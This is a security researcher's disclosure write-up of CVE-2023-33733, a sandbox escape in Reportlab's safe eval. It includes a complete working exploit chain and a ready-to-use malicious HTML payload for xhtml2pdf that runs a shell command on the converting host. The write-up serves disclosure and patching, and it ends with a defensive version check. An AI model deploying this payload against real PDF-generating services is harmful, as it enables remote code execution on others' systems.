CVE-2023-33733: GitHub - c53elyas/CVE-2023-33733: CVE-2023-33733 reportlab RCE
Reportlab up to v3.6.12 allows attackers to execute arbitrary code via supplying a crafted PDF file.
CODE INJECTION VULNERABILITY IN REPORTLAB PYTHON LIBRARY
tl;dr This write-up details how an RCE in Reportlab was found and exploited. Because Reportlab is widely used for HTML-to-PDF conversion, the vulnerability may be reachable in many applications that generate PDF files from user-supplied input, which makes it an important one to patch and to look out for.
Introduction
A few days ago, during a web application audit, we noticed that the application was using the Reportlab Python library to dynamically generate PDF files from HTML input. Reportlab had a previously patched vulnerability that led to code execution, so finding a bypass for that patch was interesting from an attacker's point of view: it would bring the code execution back, and Reportlab is also used in many other applications and tools.
What is Reportlab
First things first, a quick recap: Reportlab is an open source project that allows the creation of documents in Adobe's Portable Document Format (PDF) using the Python programming language. It also creates charts and data graphics in various bitmap and vector formats as well as PDF.
Attacking Reportlab
In 2019 the library was affected by a similar issue that led to remote code execution via the color attribute of HTML tags: the content of the attribute was evaluated directly as a Python expression with the eval function. To mitigate the issue, Reportlab implemented a sandbox called rl_safe_eval. It is stripped of all Python builtin functions and overrides several of them, so that the library's own safe code can still run while access to dangerous functions and libraries that could be used to build malicious Python code is blocked.
One example of these prevention measures is that the builtin getattr function is overridden with a restricted function, __rl_getattr__, which prohibits access to dangerous attributes of objects, such as those whose names start with __:
class __RL_SAFE_ENV__(object):
    __time_time__ = time.time
    __weakref_ref__ = weakref.ref
    __slicetype__ = type(slice(0))

    def __init__(self, timeout=None, allowed_magic_methods=None):
        self.timeout = timeout if timeout is not None else self.__rl_tmax__
        self.allowed_magic_methods = (__allowed_magic_methods__ if allowed_magic_methods==True else allowed_magic_methods) if allowed_magic_methods else []
        # [...]
        # IN THIS LINE IT CAN BE OBSERVED THAT THE BUILTIN GETATTR IS REPLACED WITH A CUSTOM FUNCTION
        # THAT CHECKS THE SAFETY OF THE PASSED ATTRIBUTE NAME BEFORE GETTING IT
        __rl_builtins__['getattr'] = self.__rl_getattr__
        __rl_builtins__['dict'] = __rl_dict__
        # [...]

    def __rl_getattr__(self, obj, a, *args):
        if isinstance(obj, strTypes) and a=='format':
            raise BadCode('%s.format is not implemented' % type(obj))
        # MULTIPLE CHECKS ARE DONE BEFORE FETCHING THE ATTRIBUTE AND RETURNING IT
        # TO THE CALLER IN THE SANDBOXED EVAL ENVIRONMENT
        self.__rl_is_allowed_name__(a)
        return getattr(obj,a,*args)

    def __rl_is_allowed_name__(self, name):
        """Check names if they are allowed.
        If ``allow_magic_methods is True`` names in `__allowed_magic_methods__`
        are additionally allowed although their names start with `_`.
        """
        if isinstance(name,strTypes):
            # NO ACCESS TO ATTRIBUTES STARTING WITH __ OR MATCHING A PREDEFINED UNSAFE ATTRIBUTE NAME
            if name in __rl_unsafe__ or (name.startswith('__')
                and name!='__'
                and name not in self.allowed_magic_methods):
                raise BadCode('unsafe access of %s' % name)
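To see the effect of this guard in isolation, here is a minimal standalone sketch of the same idea. It is not Reportlab's code: `UNSAFE_NAMES`, `is_allowed_name` and `safe_getattr` are hypothetical names, and the contents of the unsafe set are assumed for illustration only.

```python
# Simplified stand-in for the sandbox's attribute guard (illustrative only).
UNSAFE_NAMES = frozenset({"func_globals", "gi_frame"})  # assumed subset


class BadCode(ValueError):
    """Raised when sandboxed code asks for a forbidden attribute name."""


def is_allowed_name(name, allowed_magic_methods=()):
    # Same shape as the check above: reject blacklisted names and dunder names.
    if isinstance(name, str):
        if name in UNSAFE_NAMES or (
            name.startswith("__")
            and name != "__"
            and name not in allowed_magic_methods
        ):
            raise BadCode("unsafe access of %s" % name)


def safe_getattr(obj, name, *args):
    # Validate the attribute name first, then defer to the real getattr.
    is_allowed_name(name)
    return getattr(obj, name, *args)


print(safe_getattr("abc", "upper")())  # ABC

try:
    safe_getattr(lambda: None, "__code__")
except BadCode as exc:
    print(exc)  # unsafe access of __code__
```

Note that the guard only inspects the name through `in`, `startswith` and `!=`, so its verdict depends on how the name object answers those calls.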
The Bug
As described earlier, the safe eval strips the environment of all dangerous functions, so that the evaluated code has no access to tools that could be used for malicious actions. However, if a bypass of those restrictions is found and one of the original builtin functions becomes reachable, exploiting the sandboxed environment becomes much easier.
One of the many overridden builtins is type. Called with one argument, it returns the type of an object. Called with three arguments, it returns a new type object, which is essentially a dynamic form of the class statement. In other words, it allows the creation of a new class that inherits from another class.
So the idea is to create a new class called Word that inherits from str and that, when passed to the custom getattr, bypasses the checks and allows access to sensitive attributes such as __code__.
Before the custom getattr in the sandboxed eval returns an attribute, it calls __rl_is_allowed_name__ to check that the requested attribute name is safe. Only then does it call the Python builtin getattr and return the result.
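As a quick illustration of the two call forms in plain Python, outside any sandbox, consider the sketch below. The class name `Shout` and its method are made up for this example.

```python
# One argument: type() reports the class of an object.
print(type(42))  # <class 'int'>

# Three arguments (name, bases, namespace): type() builds a new class.
Shout = type("Shout", (str,), {"shout": lambda self: self.upper() + "!"})

word = Shout("hello")
print(word.shout())           # HELLO!
print(isinstance(word, str))  # True


# The equivalent class statement, for comparison.
class ShoutStmt(str):
    def shout(self):
        return self.upper() + "!"


print(ShoutStmt("hello").shout())  # HELLO!
```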
def __rl_is_allowed_name__(self, name):
    """Check names if they are allowed.
    If ``allow_magic_methods is True`` names in `__allowed_magic_methods__`
    are additionally allowed although their names start with `_`.
    """
    if isinstance(name,strTypes):
        if name in __rl_unsafe__ or (name.startswith('__')
            and name!='__'
            and name not in self.allowed_magic_methods):
            raise BadCode('unsafe access of %s' % name)
To bypass the __rl_is_allowed_name__ function, the Word class should:
- Always return False for calls to startswith, to bypass the name.startswith('__') check.
- Return False on the first call to __eq__, to bypass the name in __rl_unsafe__ check. After the first call it should return the correct response, because when __eq__ is called by the Python builtin getattr it must give the correct result.
- Have the same hash as its underlying string.
The following class fulfills these criteria:
Word = type('Word', (str,), {
    'mutated': 1,
    'startswith': lambda self, x: False,
    '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x,
    'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)},
    '__hash__': lambda self: hash(str(self))
})
code = Word('__code__')
print(code == '__code__')  ## prints False
print(code == '__code__')  ## prints True
print(code == '__code__')  ## prints True
print(code == '__code__')  ## prints True
print(code.startswith('__'))  ## prints False
The custom type function in the safe eval does not accept three arguments:
def __rl_type__(self,*args):
    if len(args)==1: return type(*args)
    raise BadCode('type call error')
A bypass for this was found by calling type on the result of another type call. type(1) returns int, and calling the one-argument form on int returns the original builtin type function:
orgTypeFun = type(type(1))
Combining these two pieces of code gives something like this:
orgTypeFun = type(type(1))
Word = orgTypeFun('Word', (str,), {
    'mutated': 1,
    'startswith': lambda self, x: False,
    '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x,
    'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)},
    '__hash__': lambda self: hash(str(self))
})
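The recovery of the original type through a wrapper that only accepts one argument can be checked outside the sandbox. The sketch below is a simplified stand-in, not Reportlab's implementation: `restricted_type` is a hypothetical function that mimics the one-argument restriction described above.

```python
import builtins


def restricted_type(*args):
    # Mimics the sandboxed wrapper: only the one-argument form is allowed.
    if len(args) == 1:
        return type(*args)
    raise ValueError("type call error")


# The three-argument form is rejected by the wrapper...
try:
    restricted_type("Point", (object,), {})
    three_args_allowed = True
except ValueError:
    three_args_allowed = False
print(three_args_allowed)  # False

# ...but type(1) is int, and the type of int is the real builtin type.
recovered = restricted_type(restricted_type(1))
print(recovered is builtins.type)  # True

# The recovered object accepts three arguments again.
Point = recovered("Point", (object,), {"x": 0})
print(Point.x)  # 0
```

The restriction is enforced in the wrapper only, so any path that hands back the underlying `type` object sidesteps it.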
Final Exploit
Now what is left is to write the exploit. To do this, a function is reconstructed from the bytecode of a compiled one:
orgTypeFun = type(type(1))
Word = orgTypeFun('Word', (str,), {
    'mutated': 1,
    'startswith': lambda self, x: False,
    '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x,
    'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)},
    '__hash__': lambda self: hash(str(self))
})
codeattr = Word('__code__')
ftype = orgTypeFun(lambda: {None})
ctype = orgTypeFun(getattr(lambda: {None}, codeattr))

# The byte code is of a function that looks like this
# def exp():
#     __import__('os').system('touch /tmp/exploited')

f = ftype(ctype(0, 0, 0, 0, 3, 67, b't\x00d\x01\x83\x01\xa0\x01d\x02\xa1\x01\x01\x00d\x00S\x00', (None, 'os', 'touch /tmp/exploited'), ('__import__', 'system'), (), '<stdin>', '', 1, b'\x12\x01'), {})
f()
However, a multi-statement snippet like this cannot be executed in an eval context, which only accepts a single expression. To work around this, a list comprehension trick can be used, something like this:
[print(x) for x in ['helloworld']]
# which would be equivalent to
x = 'helloworld'
print(x)

[[print(x + ' ' + y) for y in ['second var']] for x in ['first var']]
# which would be equivalent to
x = 'first var'
y = 'second var'
print(x + ' ' + y)
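The binding behaviour can be checked directly with eval. The sketch below is only an illustration of the trick with harmless strings; the variable names are arbitrary.

```python
# eval accepts a single expression, so an assignment statement is rejected.
try:
    eval("x = 'first var'")
    assignment_allowed = True
except SyntaxError:
    assignment_allowed = False
print(assignment_allowed)  # False

# Each "for NAME in [VALUE]" clause binds NAME for the expression it wraps,
# so the outer clause plays the role of the first assignment.
expr = "[[x + ' ' + y for y in ['second var']] for x in ['first var']]"
result = eval(expr)
print(result)  # [['first var second var']]
```

Because the outermost clause is evaluated first, a chain of dependent bindings has to be written with the earliest one at the bottom.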
With this technique the exploit code can be rewritten as a single expression like the one below. It counts as one line; the line breaks are only formatting to make the exploit easier to read. The declarations should be read from bottom to top, which looks odd but is how the nested comprehensions bind their variables:
[
    [
        [
            [
                ftype(ctype(0, 0, 0, 0, 3, 67, b't\x00d\x01\x83\x01\xa0\x01d\x02\xa1\x01\x01\x00d\x00S\x00', (None, 'os', 'touch /tmp/exploited'), ('__import__', 'system'), (), '<stdin>', '', 1, b'\x12\x01'), {})()
                for ftype in [type(lambda: None)]
            ]
            for ctype in [type(getattr(lambda: {None}, Word('__code__')))]
        ]
        for Word in [orgTypeFun('Word', (str,), {
            'mutated': 1,
            'startswith': lambda self, x: False,
            '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x,
            'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)},
            '__hash__': lambda self: hash(str(self))
        })]
    ]
    for orgTypeFun in [type(type(1))]
]
POC
Please refer to poc.py, which contains a proof of concept that demonstrates the code execution (upon successful exploitation, a file called exploited is created in /tmp/).
What Else?
Many applications and libraries use Reportlab. For example, the xhtml2pdf utility is vulnerable and can suffer from code execution while converting malicious HTML to PDF:
cat >mallicious.html <<EOF
<para><font color="[ [ [ [ [ ftype(ctype(0, 0, 0, 0, 3, 67, b't\\x00d\\x01\\x83\\x01\\xa0\\x01d\\x02\\xa1\\x01\\x01\\x00d\\x00S\\x00', (none, 'os', 'touch /tmp/exploited'), ('__import__', 'system'), (), '<stdin>', '', 1, b'\\x12\\x01'), {})() for ftype in [type(lambda: none)] ] for ctype in [type(getattr(lambda: {none}, Word('__code__')))] ] for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1==0, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]]"> exploit </font></para>
EOF
xhtml2pdf mallicious.html
ls -al /tmp/exploited
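On the defensive side, a quick way to tell whether an environment falls in the affected range is to compare the installed Reportlab version with the bound quoted in the advisory text ("up to v3.6.12"). The sketch below assumes that bound is accurate and uses a deliberately simple version parser; `parse_version`, `is_affected` and `installed_reportlab_version` are hypothetical helper names, not part of Reportlab.

```python
import re
from importlib import metadata

# Assumption taken from the advisory text: versions up to 3.6.12 are affected.
LAST_AFFECTED = (3, 6, 12)


def parse_version(text):
    """Turn '3.6.12' into (3, 6, 12); non-numeric suffixes are ignored."""
    numbers = []
    for piece in text.split(".")[:3]:
        match = re.match(r"\d+", piece)
        numbers.append(int(match.group()) if match else 0)
    while len(numbers) < 3:
        numbers.append(0)
    return tuple(numbers)


def is_affected(version_text):
    return parse_version(version_text) <= LAST_AFFECTED


def installed_reportlab_version():
    """Return the installed reportlab version string, or None if absent."""
    try:
        return metadata.version("reportlab")
    except metadata.PackageNotFoundError:
        return None


version = installed_reportlab_version()
if version is None:
    print("reportlab is not installed in this environment")
elif is_affected(version):
    print("reportlab", version, "is in the affected range, upgrade it")
else:
    print("reportlab", version, "is newer than the affected range")
```

A check like this only covers the direct dependency. Tools that bundle or pin Reportlab, such as the xhtml2pdf case above, need to be checked in the environment where they actually run.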
Related news
Debian Linux Security Advisory 5791-1 - Elyas Damej discovered that a sandbox mechanism in ReportLab, a Python library to create PDF documents, could be bypassed which may result in the execution of arbitrary code when converting malformed HTML to a PDF document.
Ubuntu Security Notice 6196-1 - It was discovered that ReportLab incorrectly handled certain PDF files. An attacker could possibly use this issue to execute arbitrary code.